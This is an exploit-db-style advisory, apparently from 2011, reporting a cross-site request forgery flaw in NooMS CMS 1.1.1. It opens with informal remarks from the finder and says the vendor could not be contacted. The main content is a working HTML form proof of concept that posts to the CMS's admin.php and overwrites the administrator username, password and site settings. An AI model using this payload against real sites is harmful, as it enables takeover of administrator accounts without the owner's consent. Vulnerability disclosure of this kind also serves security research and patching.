NooMS CMS version 1.1.1 CSRF

2011-04-09 16:15:05

# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team


# Well, I didn't have much to do this morning so figured I'd try to see how
# fast it would take
# me to find one of these. It's nothing to write home about. I mean...come
# on! Who would use
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be
# surprised if
# there are other things to be found.
# But I need to get some chores done before the wife starts.

#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but he's page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<form action='http://[host]/admin.php' method='post'>
<input type=hidden name='op' value='pref'>
<input type=hidden name='action' value='edit'>

Admin Username: <input type=text size=20 name='admin_user' value=''><br>
Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>
Site Name: <input type=text size=40 name='site_name' value=''><br>
Site URL: <input type=text size=40 name='site_url' value=''><br>
Number of results per page: <input type=text size=10 name='search_numr' value=''><br>
Lang: <input type=text size=10 name='lang' value='en'><br>
Theme: <input type=text name=template value='default'>
<input type=submit value='change'>
</form>

Fixes

No fixes

In order to submit a new fix you need to be registered.